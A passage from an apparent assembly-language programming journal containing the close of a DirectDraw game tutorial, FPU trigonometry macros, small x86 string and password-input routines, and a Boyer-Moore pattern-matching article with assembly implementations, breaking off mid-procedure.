routines coded we can write the code to display our loading game screen!
A Game ... Well, Kinda'
-----------------------
The library routines are complete and we are now ready to plunge into our
game code. We will start out by looking at the game initialization function
since it is called first in our code.
;########################################################################
; Game_Init Procedure
;########################################################################
Game_Init PROC
;=========================================================
; This function will setup the game
;=========================================================
;============================================
; Initialize Direct Draw -- 640, 480, bpp
;============================================
INVOKE DD_Init, 640, 480, screen_bpp
;====================================
; Test for an error
;====================================
.IF EAX == FALSE
;========================
; We failed so leave
;========================
JMP err
.ENDIF
;======================================
; Read in the bitmap and create buffer
;======================================
INVOKE Create_From_SFP, ADDR ptr_BMP_LOAD, ADDR szLoading,
screen_bpp
;====================================
; Test for an error
;====================================
.IF EAX == FALSE
;========================
; We failed so leave
;========================
JMP err
.ENDIF
;===================================
; Lock the DirectDraw back buffer
;===================================
INVOKE DD_Lock_Surface, lpddsback, ADDR lPitch
;============================
; Check for an error
;============================
.IF EAX == FALSE
;===================
; Jump to err
;===================
JMP err
.ENDIF
;===================================
; Draw the bitmap onto the surface
;===================================
INVOKE Draw_Bitmap, EAX, ptr_BMP_LOAD, lPitch, screen_bpp
;===================================
; Unlock the back buffer
;===================================
INVOKE DD_Unlock_Surface, lpddsback
;============================
; Check for an error
;============================
.IF EAX == FALSE
;===================
; Jump to err
;===================
JMP err
.ENDIF
;=====================================
; Everything okay so flip displayed
; surfaces and make loading visible
;======================================
INVOKE DD_Flip
;============================
; Check for an error
;============================
.IF EAX == FALSE
;===================
; Jump to err
;===================
JMP err
.ENDIF
done:
;===================
; We completed
;===================
return TRUE
err:
;===================
; We didn't make it
;===================
return FALSE
Game_Init ENDP
;########################################################################
; END Game_Init
;########################################################################
This function plays the most important part in our game so far. In this
routine we make the call to initialize Direct Draw. If this succeeds we load
in our "Loading Game" bitmap file from disk. After that we lock the back
buffer. This is very important to do since we will be accessing the memory
directly. After it is locked we can draw our bitmap onto the surface and
then unlock it. The final call in our procedure is to flip the buffers.
Since we have the bitmap on the back buffer, we need it to be visible.
Therefore, we exchange the buffers. The front goes to the back and the back
goes to the front. At the completion of this call our bitmap is now visible
on screen. One thing that may be confusing here is why we didn't load the
bitmap into a Direct Draw surface. The reason is we will only be using it
once so there was no need to waste a surface.
Next on our list of things to code is the Windows callback function itself.
This function is how we handle messages in Windows. Anytime we want to
handle a message the code will go in this function. Take a look at how we
have it set up currently.
;########################################################################
; Main Window Callback Procedure -- WndProc
;########################################################################
WndProc PROC hWin :DWORD,
uMsg :DWORD,
wParam :DWORD,
lParam :DWORD
.IF uMsg == WM_COMMAND
;===========================
; We don't have a menu, but
; if we did this is where it
; would go!
;===========================
.ELSEIF uMsg == WM_KEYDOWN
;=======================================
; Since we don't have a Direct input
; system coded yet we will just check
; for escape to be pressed
;=======================================
MOV EAX, wParam
.IF EAX == VK_ESCAPE
;===========================
; Kill the application
;===========================
INVOKE PostQuitMessage,NULL
.ENDIF
;==========================
; We processed it
;==========================
return 0
.ELSEIF uMsg == WM_DESTROY
;===========================
; Kill the application
;===========================
INVOKE PostQuitMessage,NULL
return 0
.ENDIF
;=================================================
; Let the default procedure handle the message
;=================================================
INVOKE DefWindowProc,hWin,uMsg,wParam,lParam
RET
WndProc endp
;########################################################################
; End of Main Windows Callback Procedure
;########################################################################
The code is fairly self-explanatory. So far we only deal with two messages:
the WM_KEYDOWN message and the WM_DESTROY message. We process the WM_KEYDOWN
message so that the user can hit escape and exit our game. We will be coding
a Direct Input system, but until then we needed a way to quit the game! The
one thing you should notice is that any messages we do not deal with are
handled by the "default" processing function -- DefWindowProc(). This
function is defined by Windows already. You just need to call it whenever
you do not handle a message.
The game main function we aren't going to look at, simply because it is
empty. We haven't added any solid code to our game loop yet. But, everything
is prepared so that next time we can get to it. That then leaves us with the
shutdown code.
;########################################################################
; Game_Shutdown Procedure
;########################################################################
Game_Shutdown PROC
;============================================================
; This shuts our game down and frees memory we allocated
;============================================================
;===========================
; Shutdown DirectDraw
;===========================
INVOKE DD_ShutDown
;==========================
; Free the bitmap memory
;==========================
INVOKE GlobalFree, ptr_BMP_LOAD
done:
;===================
; We completed
;===================
return TRUE
err:
;===================
; We didn't make it
;===================
return FALSE
Game_Shutdown ENDP
;########################################################################
; END Game_Shutdown
;########################################################################
Here we make the call to shut down our Direct Draw library, and we also free
the memory we allocated earlier for the bitmap. We could have freed the
memory elsewhere and maybe next issue we will. But, things are a bit easier
to understand when all of your initialization and cleanup code is in one
place.
As you can see there isn't that much code in our game specific stuff. The
majority resides in our modules, such as Direct Draw. This allows us to keep
our code clean and makes any changes we may need to make later on much
easier, since things aren't hard-coded inline. Anyway, the end result of
what you have just seen is a Loading screen that is displayed until the user
hits the escape key. And that ... primitive though it may be ... is our game
thus far.
Until Next Time ...
-------------------
We covered a lot of material in this article. We now have a bitmap library,
and a Direct Draw library for our game. These are core modules that you
should be able to use in any game. By breaking up the code like this we are
able to keep our game code separate from the library code. You do not want
any module to be dependent on another module.
In the next article we will be continuing our module development with Direct
Input. We will also be creating our menu system next time. These two things
should keep us busy. So, that is what you have to look forward to in the
next installment.
Once again young grasshoppers, until next time ... happy coding.
Get the complete source for the game here:
http://asmjournal.freeservers.com/files/game2.zip
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
Basic trigonometry functions
by Eoin O'Callaghan
;Summary: Basic trigonometry functions not directly supported on the FPU
; (ArcCos, ArcSin, HSin, HCos and HTan).
;Compatibility: Floating-Point Unit.
;Notes: None.
.data
hPi dt 3FFFC90FDAA22168C235h ; tbyte
iL2e dt 3FFEB17217F7D1CF79ACh ; tbyte
half dd 0.5
ArcCos MACRO ;Inverse Cosine, st(0) = arccos(st(0))
fld1
fld st(1)
fmul st,st
fsub
fsqrt
fpatan
fchs
fld hPi
fadd
EndM
ArcSin Macro ;Inverse Sine, st(0) = arcsin(st(0))
fld1
fld st(1)
fmul st,st
fsub
fsqrt
fpatan
EndM
HSin Macro ;Hyperbolic Sin, st(0) = hsin(st(0))
fldl2e
fmul
fld st
frndint
fsub st(1),st
fld1
fscale
fxch
fstp st
fxch
f2xm1
fld1
fadd
fmul
fld st
fld1
fdivr
fsub
fmul half
EndM
HCos Macro ;Hyperbolic Cos, st(0) = hcos(st(0))
fldl2e
fmul
fld st
frndint
fsub st(1),st
fld1
fscale
fxch
fstp st
fxch
f2xm1
fld1
fadd
fmul
fld st
fld1
fdivr
fadd
fmul half
EndM
HTan Macro ;Hyperbolic Tan, st(0) = htan(st(0))
fldl2e
fmul
fld st
frndint
fsub st(1),st
fld1
fscale
fxch
fstp st
fxch
f2xm1
fld1
fadd
fmul
fmul st,st
fld st
fld1
fadd
fxch
fld1
fsub
fdivr
EndM
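The macros above lean on a handful of identities: arcsin(x) is the angle
whose tangent is x / sqrt(1 - x*x), arccos(x) is pi/2 minus that angle, and
e^x is computed as 2^(x * log2(e)) split into a whole and a fractional
power of two. The following Python sketch mirrors those steps so they can
be checked numerically; it illustrates the arithmetic only, and the
function names are hypothetical.

```python
import math


def arcsin(x: float) -> float:
    # fpatan computes atan2(st(1), st(0)) = atan2(x, sqrt(1 - x*x))
    return math.atan2(x, math.sqrt(1.0 - x * x))


def arccos(x: float) -> float:
    # fchs / fld hPi / fadd: pi/2 - arcsin(x)
    return math.pi / 2 - arcsin(x)


def exp_via_pow2(x: float) -> float:
    y = x * math.log2(math.e)      # fldl2e / fmul
    whole = round(y)               # frndint (round to nearest)
    frac = y - whole               # fsub st(1),st
    # f2xm1 + 1 gives 2^frac; fscale supplies the factor 2^whole
    return math.ldexp(2.0 ** frac, whole)


def hsin(x: float) -> float:
    e = exp_via_pow2(x)
    return (e - 1.0 / e) * 0.5


def hcos(x: float) -> float:
    e = exp_via_pow2(x)
    return (e + 1.0 / e) * 0.5


def htan(x: float) -> float:
    e2 = exp_via_pow2(x) ** 2      # fmul st,st
    return (e2 - 1.0) / (e2 + 1.0)


print(math.isclose(arccos(0.5), math.acos(0.5)),
      math.isclose(hsin(1.0), math.sinh(1.0)))
```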
getpass
by Jake Bush
;Summary: Get a password type input.
;Compatibility: x86
;Notes: input:
; BX = Max length to save.
; ES:DI = Location to save the input. (Size must be at least
; BX + 1).
; output:
; none.
getpass:
pusha
xor cx, cx
.1: xor ah, ah
int 16h
cmp al, 0dh
je .4
cmp cx, 0h
je .2
cmp al, 8h
je .3
.2: cmp cx, bx
je .1
cmp al, 20h
jb .1
stosb
pusha
mov al, '*'
mov ah, 0eh
xor bh, bh
mov cx, 1h
int 10h
popa
inc cx
jmp .1
.3: dec di
dec cx
pusha
mov al, 8h
mov ah, 0eh
xor bh, bh
mov cx, 1h
int 10h
mov al, ' '
int 10h
mov al, 8h
int 10h
popa
jmp .1
.4: mov al, 0h
stosb
popa
ret
strcmp
by Jake Bush
;Summary: Compares two strings.
;Compatibility: x86
;Notes: input:
; DS:SI = String 1.
; ES:DI = String 2.
; output:
; CF = 0 = Equal
; 1 = Unequal
strcmp:
pusha
.1: mov al, [ds:si]
mov ah, [es:di]
cmp ah, al
jne .2
cmp ax, 0h
je .3
inc si
inc di
jmp .1
.2: stc
jmp .4
.3: clc
.4: popa
ret
strlwr
by Jake Bush
;Summary: Converts all the characters in an ASCIIz string to lower-case.
;Compatibility: x86
;Notes: input:
; DS:SI = Location of a string to convert.
; ES:DI = Location to save the converted string.
; output:
; none.
strlwr:
pusha
.1: lodsb
cmp al, 0h
je .3
cmp al, 41h
jb .2
cmp al, 5ah
ja .2
or al, 00100000b
.2: stosb
jmp .1
.3: popa
ret
strupr
by Jake Bush
;Summary: Converts all the characters in an ASCIIz string to upper-case.
;Compatibility: x86
;Notes: input:
; DS:SI = Location of a string to convert.
; ES:DI = Location to save the converted string.
; output:
; none.
strupr:
pusha
.1: lodsb
cmp al, 0h
je .3
cmp al, 61h
jb .2
cmp al, 7ah
ja .2
xor al, 00100000b
.2: stosb
jmp .1
.3: popa
ret
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
Challenge
---------
Code a fast pattern matching algorithm.
Solution
--------
Four approaches are presented here: three by Steve Hutchesson, who also
wrote a very good introductory text explaining the foundation of the Boyer
Moore search algorithm and its variations, and one by buliaNaza, who aims at
writing the fastest binary string search algorithm for PPlain and PMMX
processors.
Three Boyer Moore Exact Pattern Matching Algorithms
by Steve Hutchesson
Three Boyer Moore Exact Pattern Matching Algorithms
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Steve Hutchesson
Sydney
Australia
August 2001
hutch@...
In 1977 Robert S. Boyer and J Strother Moore designed an exact pattern
matching algorithm that was different from any of the contemporary designs
of the time. It had a fundamentally different logic that compared the
pattern being searched for to the current location in the source in reverse
order. The logic was based on obtaining more information from performing the
comparison in reverse than the standard methods of forward comparison. If a
character that caused the mismatch was not among the characters that were
in the pattern being matched, there was no point in matching any further
characters so the pattern could be shifted right by the number of
characters needed to go past it.
This shift has usually been called the BAD CHARACTER shift.
              |
source  : bad character shift
pattern : shift
              |
Character "t" mismatches with character "c" in the source. "c" is not in
the pattern being searched for and there is no point in searching further
back as no match is possible at the current location so the pattern is
shifted the number of places right so that the pattern is completely past
the mismatching character.
                   |
source  : bad character shift
pattern :      shift
                   |
Character "t" again mismatches with character "c" in the source so the
pattern is again shifted completely past the mismatching character.
                        |
source  : bad character shift
pattern :           shift
                        |
The next mismatch is different from the previous ones: it is with a
character ("s") that is within the pattern being searched for, and this
requires a different type of shift. When the character is within the
pattern, a match may still be possible, so the pattern can only be shifted
far enough to line that character up with its position in the pattern. This
shift is usually called the GOOD SUFFIX shift but it is sometimes called the
MATCHING SHIFT.
The fundamental Boyer Moore design uses a clever method of determining if
the character being compared is within the pattern being searched for or
not. It constructs a table of 256 members which is initially filled with
the length of the pattern being searched for in the source. It then
overwrites the entry at each pattern character's ASCII value with the shift
for that character's position in the pattern.
This means that a character being compared can be tested in one memory read
to determine if it is within the pattern or not. If the shift in the table
is the same length as the pattern, the character is not in the pattern; if
it is less, it is a character that is in the pattern.
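A minimal Python sketch of building such a table follows. It assumes, as
the "4321" row for the pattern "shift" in this article suggests, that the
last character of the pattern is not written into the table; the function
name is hypothetical and this is not the author's assembler code.

```python
def build_shift_table(pattern: bytes) -> list:
    """Return a 256-entry shift table for the given pattern."""
    length = len(pattern)
    table = [length] * 256          # default: character not in pattern
    # Every character except the last gets its distance from the end of
    # the pattern. A repeated character is overwritten by its later
    # (smaller) shift.
    for index in range(length - 1):
        table[pattern[index]] = length - 1 - index
    return table


table = build_shift_table(b"shift")
print([table[c] for c in b"shif"], table[ord("c")])
# prints: [4, 3, 2, 1] 5
```

A single lookup such as table[ord("c")] == len(pattern) is the one memory
read that tells us the character is not in the pattern.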
This will produce a set of shifts for the characters in the pattern that
descend in their value.
pattern : shift
          4321  <- GOOD SUFFIX shift
          12345 <- BAD CHARACTER shift
The method of calculating the BAD CHARACTER shift is based on the ascending
count from the beginning of the pattern. If it is the first character being
compared, the shift is the length of the pattern; for each further
comparison made, the shift decrements by one.
Apply the GOOD SUFFIX shift from the table and the pattern is shifted
across so that the character "s" lines up with the "s" in the source and
the pattern has been matched.
                        *
source  : bad character shift
pattern :               shift
                        *
This example works OK because the mismatch occurs on the first comparison,
but in patterns that have repeated sequences of characters, this matching by
itself will often fail to produce a match.
pattern : foooooo
          711111  <- GOOD SUFFIX shift
          1234567 <- BAD CHARACTER shift
The sequence of "1" in the GOOD SUFFIX shift is caused by the overwriting
of the location for the character "o" in the table for each of its
occurrences. The normal method is to subtract the BAD CHARACTER shift from
the GOOD SUFFIX shift if the mismatch is not the first at the current
location in the source. This can produce a value less than 1 so a minimum
shift of 1 is applied if this happens.
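Putting the pieces together, a complete search along these lines can be
sketched in Python as below. It is an illustration under stated
assumptions, not the author's assembler versions: the table leaves out the
last pattern character, and the amount subtracted from the table shift is
the number of characters already matched at the current location (zero on
the first comparison), which is one reading of the subtraction described
above. The name bm_find is hypothetical.

```python
def bm_find(source: bytes, pattern: bytes) -> int:
    """Return the index of the first match, or -1 if there is none."""
    length = len(pattern)
    if length == 0:
        return 0
    table = [length] * 256
    for index in range(length - 1):
        table[pattern[index]] = length - 1 - index

    start = 0
    while start + length <= len(source):
        pos = length - 1                     # compare in reverse order
        while pos >= 0 and source[start + pos] == pattern[pos]:
            pos -= 1
        if pos < 0:
            return start                     # every character matched
        matched = length - 1 - pos
        # For a character that is not in the pattern this works out to
        # pos + 1, which moves the pattern completely past it.
        shift = table[source[start + pos]] - matched
        start += max(shift, 1)               # minimum shift of 1
    return -1


print(bm_find(b"bad character shift", b"shift"))
# prints: 14
```

On the example used in this article the pattern is tried at offsets 0, 5,
10 and 14, the same sequence of shifts shown in the diagrams.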
Coding Considerations
~~~~~~~~~~~~~~~~~~~~~
Much of the available technical data on exact pattern matching is written
in ANSI C and it tends to carry the set of assumptions related to the
capacity of that language. The "holy grail" of exact pattern matching is to
perform as few comparisons as necessary to obtain the match if it exists.
This is usually called "sublinearity" and it means comparing fewer
characters than a traditional forward BYTE scanner.
The problem with this approach is that if the overhead to produce the
"sublinearity" is too large, the algorithm is slower than a BYTE scanner so
considerations of theoretical design must be tempered with what is possible
with good coding practice to deliver the desired speed.
The BAD CHARACTER shift has often been coded in high level languages as
another table but it is a very inefficient way to code the shift as the
loop counter in the main comparison loop holds the same value and it can be
accessed a lot faster than a member of a table in memory.
The three versions presented below use an Intel specific optimisation that
prevents a partial register stall, which would otherwise occur when a byte
is read into AL and the full EAX register is then used in the table location
calculation. XOR EAX, EAX or SUB EAX, EAX both zero the register first so
the stall does not occur. This makes the code slightly slower on AMD
hardware but not by very much.
There is an additional heuristic in the original Boyer Moore algorithm that
has not been implemented. When a BAD CHARACTER shift has been determined,
the heuristic requires that the larger of the two shifts be applied.
In practice the two extra instructions to perform this comparison reduce
the speed of the algorithm by about 5%.
Where a GOOD SUFFIX shift is required for the first mismatch at the
current location, the calculation that subtracts the BAD CHARACTER shift is
not required, so a separate loop has been included to save these two extra
instructions. The speed increase from doing so is about 5%.
Processor Variation
~~~~~~~~~~~~~~~~~~~
Testing shows that there are measurable differences between later Intel
processors and later AMD processors. The AMD has a shorter pipeline and a
lower penalty for register stalls, whereas the Intel processors have better
branch prediction and a lower penalty for mispredicted jumps. The GOOD
SUFFIX shift favours the AMD processors whereas the BAD CHARACTER shift
works better on the Intel processors.
Three variations are implemented that utilise the different shifts: the
original BM algorithm uses both shifts, a variation that is similar to a
Horspool variation uses only the BAD CHARACTER shift, and another variation
uses only the GOOD SUFFIX shift.
Algorithm Variations
~~~~~~~~~~~~~~~~~~~~
The original BM algorithm has a slightly higher overhead than the two
variations but it generally produces a larger shift, and this has the effect
that it is more consistent across both processor types with different
patterns and different pattern lengths. This is because it is more
dependent on logic than on fast loop code.
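As a rough picture of how the two shifts combine, here is a C sketch that mirrors the control flow of the BMBinSearch listing: a table lookup on mismatch, the BAD CHARACTER shift when the character is not in the table, otherwise the GOOD SUFFIX calculation with a minimum of 1. The function name bm_search is hypothetical, and the sketch makes no attempt to reproduce the register-level optimisations.

```c
#include <assert.h>
#include <stddef.h>

/* Returns the zero-based offset of the first match at or after start,
   -1 if there is none, -2 if the pattern is shorter than 2 bytes. */
long bm_search(size_t start, const unsigned char *src, size_t src_len,
               const unsigned char *pat, size_t pat_len)
{
    size_t table[256];

    assert(src != NULL && pat != NULL);
    if (pat_len < 2)
        return -2;
    if (src_len < pat_len || start > src_len - pat_len)
        return -1;

    for (size_t i = 0; i < 256; i++)
        table[i] = pat_len;                 /* default shift */
    for (size_t i = 0; i + 1 < pat_len; i++)
        table[pat[i]] = pat_len - 1 - i;    /* descending counts */

    size_t last = src_len - pat_len;        /* last valid start offset */
    size_t pos = start;
    while (pos <= last) {
        size_t idx = pat_len;               /* compare from the pattern end */
        while (idx > 0 && src[pos + idx - 1] == pat[idx - 1])
            idx--;
        if (idx == 0)
            return (long)pos;               /* every character matched */
        idx--;                              /* 0-based mismatch index */

        size_t t = table[src[pos + idx]];
        if (t == pat_len) {
            pos += idx + 1;                 /* BAD CHARACTER shift */
        } else {
            size_t compared = (pat_len - 1) - idx;
            pos += (t > compared) ? t - compared : 1;   /* GOOD SUFFIX shift */
        }
    }
    return -1;
}
```

The return values follow the convention used by the assembly procedures, so the sketch can serve as a reference when checking their results.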
The Horspool variation performs well on Intel hardware and is well suited to
plain text search in things like text editors and word processors, but it is
sensitive to patterns whose characters occur with high frequency in the
source being searched. Its advantage is small loop code in the searching
phase. In this implementation, it does the comparison in reverse order as
this method produces the BAD CHARACTER shift in the most efficient manner.
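The shift rule of this variation can be sketched in C as follows. The sketch assumes the behaviour of the BMHBinsearch listing: a minimum shift of 1, extended by the loop counter only when the mismatching character is not in the table. The name bmh_search is hypothetical, and a simple membership array stands in for the shift table.

```c
#include <assert.h>
#include <stddef.h>

/* Returns the zero-based offset of the first match at or after start,
   -1 if there is none, -2 if the pattern is shorter than 2 bytes. */
long bmh_search(size_t start, const unsigned char *src, size_t src_len,
                const unsigned char *pat, size_t pat_len)
{
    unsigned char in_pattern[256] = {0};

    assert(src != NULL && pat != NULL);
    if (pat_len < 2)
        return -2;
    if (src_len < pat_len || start > src_len - pat_len)
        return -1;

    /* Mark every pattern character except the last one. */
    for (size_t i = 0; i + 1 < pat_len; i++)
        in_pattern[pat[i]] = 1;

    size_t last = src_len - pat_len;        /* last valid start offset */
    size_t pos = start;
    while (pos <= last) {
        size_t idx = pat_len;               /* reverse order comparison */
        while (idx > 0 && src[pos + idx - 1] == pat[idx - 1])
            idx--;
        if (idx == 0)
            return (long)pos;
        idx--;                              /* loop counter at the mismatch */
        if (in_pattern[src[pos + idx]])
            pos += 1;                       /* minimum shift */
        else
            pos += idx + 1;                 /* BAD CHARACTER shift */
    }
    return -1;
}
```

Because the loop counter already holds the distance needed to step past the offending character, no second table is required.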
The second variation uses only the GOOD SUFFIX shift and generally performs
well on older Intel hardware and later AMD machines. It has the advantage of
fast loop code but by only using one of the available shifts, its average
shift length is shorter than the original algorithm. It uses the same bypass
for the first mismatch that the original BM algo has.
Limitations
~~~~~~~~~~~
The pattern length threshold for improving on a forward byte scanner appears
to be about 6 characters. Below this a BYTE scanner is faster. A BM type
algorithm has about a 300 character penalty in the time it takes to construct
the table and this must be kept in mind if the task requires recursively
searching short sources for short patterns.
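One way to act on these figures is to fall back to a plain byte scanner for short patterns or short sources. The C sketch below is only an illustration: the names byte_scan and prefer_table_search and the two constants are hypothetical, and the thresholds are the approximate values quoted above, which would need to be measured on the target machine.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define MIN_TABLE_PATTERN 6     /* pattern length threshold from the text */
#define TABLE_SETUP_COST  300   /* approximate table penalty in characters */

/* Plain forward byte scanner: returns the match offset or -1. */
long byte_scan(size_t start, const unsigned char *src, size_t src_len,
               const unsigned char *pat, size_t pat_len)
{
    assert(src != NULL && pat != NULL);
    if (pat_len == 0 || src_len < pat_len)
        return -1;
    for (size_t pos = start; pos <= src_len - pat_len; pos++) {
        if (src[pos] == pat[0] && memcmp(src + pos, pat, pat_len) == 0)
            return (long)pos;
    }
    return -1;
}

/* Nonzero when a table-driven search is likely to pay for its setup. */
int prefer_table_search(size_t src_len, size_t pat_len)
{
    return pat_len >= MIN_TABLE_PATTERN && src_len > TABLE_SETUP_COST;
}
```

A caller would test prefer_table_search first and use byte_scan whenever it returns zero.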
A slightly more subtle consideration is what is called "mismatch recovery".
Boyer Moore algorithms have normally been sensitive to the frequency of end
characters in the pattern and this is easy to demonstrate when searching plain
text when the pattern has a trailing blank space in it. EXAMPLE : "pattern "
The solution is to code the comparison loop with a very short instruction path
and while this does not particularly increase the absolute forward scanning
speed of the algorithm type, it does improve its recovery from repeated
mismatches.
The three algorithms presented below have very good mismatch recovery which is
related to the very short instruction paths of their comparison loops.
The three algorithms have been tested on Intel Celeron, PII and PIII machines
and AMD K6-2, Duron and Athlon machines. They have been optimised to run on
both types without specifically targeting one particular model. Slight speed
increases can be obtained by coding specifically for one particular model
but usually at the expense of most other processors.
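The parameters for the 3 procedures:
startpos   zero based offset to start searching in the source
lpSource   the address of the source to search
srcLngth   the length of the source
lpSubStr   the address of the pattern to search for
subLngth   the length of the pattern
Each procedure returns the zero based offset of the match in EAX, -1 if
there is no match, or -2 if the pattern is shorter than 2 characters.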
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ @
@ The basic Boyer Moore algorithm @
@ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
; #########################################################################
.486
.model flat, stdcall ; 32 bit memory model
option casemap :none ; case sensitive
.code
; #########################################################################
BMBinSearch proc startpos:DWORD,
lpSource:DWORD,srcLngth:DWORD,
lpSubStr:DWORD,subLngth:DWORD
LOCAL cval :DWORD
LOCAL shift_table[256]:DWORD
push ebx
push esi
push edi
mov ebx, subLngth
cmp ebx, 1
jg @F
mov eax, -2 ; string too short, must be > 1
jmp Cleanup
@@:
mov esi, lpSource
add esi, srcLngth
sub esi, ebx
mov edx, esi ; set Exit Length
; ----------------------------------------
; load shift table with value in subLngth
; ----------------------------------------
mov ecx, 256
mov eax, ebx
lea edi, shift_table
rep stosd
; ----------------------------------------------
; load descending count values into shift table
; ----------------------------------------------
mov ecx, ebx ; SubString length in ECX
dec ecx ; correct for zero based index
mov esi, lpSubStr ; address of SubString in ESI
lea edi, shift_table
xor eax, eax
Write_Shift_Chars:
mov al, [esi] ; get the character
inc esi
mov [edi+eax*4], ecx ; write shift for each character
dec ecx ; to ascii location in table
jnz Write_Shift_Chars
; -----------------------------
; set up for main compare loop
; -----------------------------
mov ecx, ebx
dec ecx
mov cval, ecx
mov esi, lpSource
mov edi, lpSubStr
add esi, startpos ; add starting position
jmp Pre_Loop
; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Calc_Suffix_Shift:
add eax, ecx
sub eax, cval ; sub loop count
jns Add_Suffix_Shift
mov eax, 1 ; minimum shift is 1
Add_Suffix_Shift:
add esi, eax ; add SUFFIX shift
mov ecx, cval ; reset counter in compare loop
Test_Length:
cmp edx, esi ; test exit condition
jl No_Match
Pre_Loop:
xor eax, eax ; zero EAX for following partial writes
mov al, [esi+ecx]
cmp al, [edi+ecx] ; cmp characters in ESI / EDI
je @F
mov eax, shift_table[eax*4]
cmp ebx, eax
jne Add_Suffix_Shift ; bypass SUFFIX calculations
lea esi, [esi+ecx+1] ; add BAD CHAR shift
jmp Test_Length
@@:
dec ecx
xor eax, eax ; zero EAX for following partial writes
Cmp_Loop:
mov al, [esi+ecx]
cmp al, [edi+ecx] ; cmp characters in ESI / EDI
jne Set_Shift ; if not equal, get next shift
dec ecx
jns Cmp_Loop
jmp Match ; fall through on match
Set_Shift:
mov eax, shift_table[eax*4]
cmp ebx, eax
jne Calc_Suffix_Shift ; run SUFFIX calculations
lea esi, [esi+ecx+1] ; add BAD CHAR shift
jmp Test_Length
; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Match:
sub esi, lpSource ; sub source from ESI
mov eax, esi ; put length in eax
jmp Cleanup
No_Match:
mov eax, -1
Cleanup:
pop edi
pop esi
pop ebx
ret
BMBinSearch endp
; #########################################################################
end
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ @
@ The Horspool style variation using the BAD CHARACTER shift @
@ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
; #########################################################################
.486
.model flat, stdcall ; 32 bit memory model
option casemap :none ; case sensitive
.code
; #########################################################################
BMHBinsearch proc startpos:DWORD,
lpSource:DWORD,srcLngth:DWORD,
lpSubStr:DWORD,subLngth:DWORD
LOCAL cval:DWORD
LOCAL shift_table[256]:DWORD
push ebx
push esi
push edi
mov ebx, subLngth
cmp ebx, 1
jg @F
mov eax, -2 ; string too short, must be > 1
jmp BMHout
@@:
mov esi, lpSource
add esi, srcLngth
sub esi, ebx
mov edx, esi ; set Exit Length
; ----------------------------------------
; load shift table with value in subLngth
; ----------------------------------------
mov ecx, 256
mov eax, ebx
lea edi, shift_table
rep stosd
; ----------------------------------------------
; load descending count values into shift table
; ----------------------------------------------
mov ecx, ebx ; SubString length in ECX
dec ecx ; correct for zero based index
mov esi, lpSubStr ; address of SubString in ESI
lea edi, shift_table
xor eax, eax
Write_Chars:
mov al, [esi] ; get the character
inc esi
mov [edi+eax*4], ecx ; write shift for each character
dec ecx ; to ascii location in table
jnz Write_Chars
; -----------------------------
; set up for main compare loop
; -----------------------------
mov ecx, ebx
dec ecx
mov cval, ecx
mov esi, lpSource
mov edi, lpSubStr
add esi, startpos ; add starting position
; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Main_Loop:
sub eax, eax ; zero EAX before partial write
mov al, [esi+ecx]
cmp al, [edi+ecx] ; cmp characters in ESI / EDI
jne Get_Shift ; if not equal, get next shift
dec ecx
jns Main_Loop
jmp Matchx
Get_Shift:
inc esi ; inc esi for minimum shift
cmp ebx, shift_table[eax*4] ; cmp subLngth to char shift
jne Exit_Test
add esi, ecx ; add bad char shift
Exit_Test:
mov ecx, cval ; reset counter in compare loop
cmp esi, edx ; test for exit condition
jle Main_Loop ; also test the last valid start position
jmp MisMatch
; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Matchx:
sub esi, lpSource ; sub source from ESI
mov eax, esi ; put length in eax
jmp BMHout
MisMatch:
mov eax, -1
BMHout:
pop edi
pop esi
pop ebx
ret
BMHBinsearch endp
; #########################################################################
end
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ @
@ The simplified version using the GOOD SUFFIX shift @
@ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
; #########################################################################
.486
.model flat, stdcall ; 32 bit memory model
option casemap :none ; case sensitive
.code
; #########################################################################
SBMBinSearch proc startpos:DWORD,
lpSource:DWORD,srcLngth:DWORD,
lpSubStr:DWORD,subLngth:DWORD
LOCAL shift_table[256]:DWORD
push ebx
push esi
push edi
mov edx, subLngth
cmp edx, 1
jg @F
mov eax, -2 ; string too short, must be > 1
jmp Cleanup
@@:
mov esi, lpSource
add esi, srcLngth
sub esi, edx
mov ebx, esi ; set Exit Length
; ----------------------------------------
; load shift table with value in subLngth
; ----------------------------------------
mov ecx, 256
mov eax, edx
lea edi, shift_table
rep stosd
; ----------------------------------------------
; load descending count values into shift table
; ----------------------------------------------
mov ecx, edx ; SubString length in ECX
dec ecx ; correct for zero based index
mov esi, lpSubStr ; address of SubString in ESI
lea edi, shift_table
xor eax, eax
Write_Shift_Chars:
mov al, [esi] ; get the character
inc esi
mov [edi+eax*4], ecx ; write shift for each character
dec ecx ; to ascii location in table
jnz Write_Shift_Chars
; -----------------------------
; set up for main compare loop
; -----------------------------
mov esi, lpSource
mov edi, lpSubStr
dec edx
xor eax, eax ; zero EAX
add esi, startpos ; add starting position
mov ecx, edx ; start comparing at the last pattern character
jmp Cmp_Loop
; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
